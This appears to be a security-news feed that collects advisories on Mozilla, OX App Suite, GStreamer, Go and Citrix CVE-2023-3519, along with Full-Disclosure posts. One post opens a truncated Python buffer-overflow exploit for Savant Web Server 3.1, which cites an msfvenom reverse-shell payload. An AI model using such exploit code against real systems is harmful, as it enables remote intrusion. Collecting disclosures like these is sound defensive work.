Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.

Mozilla Firefox is a web browser used to access the Internet.
Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations.
Mozilla Thunderbird is an email client.

Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

OXAS-ADV-2023-0003: OX App Suite Security Advisory

Posted by Martin Heiland via Fulldisclosure on Aug 02

Dear subscribers,

We’re sharing our latest advisory with you and would like to thank everyone who contributed in finding and solving those
vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at YesWeHack.

This advisory has also been published at https://documentation.open-xchange.com/security/advisories/.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH

Internal reference: OXUIB-2282
Type:…

RansomLord v1 / Anti-Ransomware Exploit Tool

Posted by malvuln on Aug 02

RansomLord is a proof-of-concept tool that automates the creation of PE
files, used to compromise Ransomware pre-encryption.

Lang: C

SHA256: b0dfa2377d7100949de276660118bbf21fa4e56a4a196db15f5fb344a5da33ee

Video PoC:
https://www.youtube.com/watch?v=_Ho0bpeJWqI

Download: https://github.com/malvuln/RansomLord

RansomLord generated PE files are saved to disk in the x32 or x64
directories where the program is run from.

Goal is to exploit code…

Savant Web Server 3.1 – Remote Buffer Overflow (Egghunter)

Posted by Mahmoud Noureldin on Aug 02

This is an old app but in an easy way which not the same which in public.

Exploit Title: Savant Web Server 3.1 – Remote Buffer Overflow (Egghunter)

# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]

import socket
import sys

try:
    server = b"192.168.56.102"
    # \x00\x0a\x0d\x25
    port = 80
    size = 253
    # msfvenom -p windows/shell_reverse_tcp…

USN-6268-1: GStreamer Base Plugins vulnerabilities

It was discovered that GStreamer Base Plugins incorrectly handled certain
FLAC image tags. A remote attacker could use this issue to cause GStreamer
Base Plugins to crash, resulting in a denial of service, or possibly
execute arbitrary code. (CVE-2023-37327)

It was discovered that GStreamer Base Plugins incorrectly handled certain
subtitles. A remote attacker could use this issue to cause GStreamer Base
Plugins to crash, resulting in a denial of service, or possibly execute
arbitrary code. (CVE-2023-37328)

golang-1.19.12-1.fc37

FEDORA-2023-1819dc9854

Packages in this update:

golang-1.19.12-1.fc37

Update description:

This update includes a security fix to the crypto/tls package, as well as bug fixes to the assembler and the compiler.

This update includes a security fix to the net/http package, as well as bug fixes to the compiler, cgo, the cover tool, the go command, the runtime, and the crypto/ecdsa, go/build, go/printer, net/mail, and text/template packages.

golang-1.20.7-1.fc38

FEDORA-2023-a6c1ad5860

Packages in this update:

golang-1.20.7-1.fc38

Update description:

This update includes a security fix to the crypto/tls package, as well as bug fixes to the assembler and the compiler.

Citrix NetScaler ADC and NetScaler Gateway Unauthenticated Remote Code Execution Vulnerability (CVE-2023-3519)

What is Citrix NetScaler ADC and NetScaler Gateway?

Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic.

Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access.

What is the Attack?

According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products.

To be vulnerable, those products must be configured as a gateway or as an authentication, authorization and auditing (AAA) virtual server. The advisory also states that Citrix-managed servers are already mitigated and no action is required.

Why is this Significant?

This is significant because the Citrix advisory acknowledged that CVE-2023-3519 was exploited in the wild. Also, CISA added the vulnerability to the Known Exploited Vulnerabilities Catalog on July 19th, 2023. CISA released an advisory on July 20th stating that the vulnerability was exploited as a zero-day in June affecting an unnamed critical infrastructure organization.

FortiGuard Labs advises users to install the relevant updated version of NetScaler ADC and NetScaler as soon as possible.

What is the Vendor Solution?

Citrix released relevant updates on July 18th, 2023.

What FortiGuard Coverage is available?

FortiGuard Labs has an IPS signature “Citrix.NetScaler.ADC.Gateway.Remote.Code.Execution” (default action is set to “pass”) in place for CVE-2023-3519.
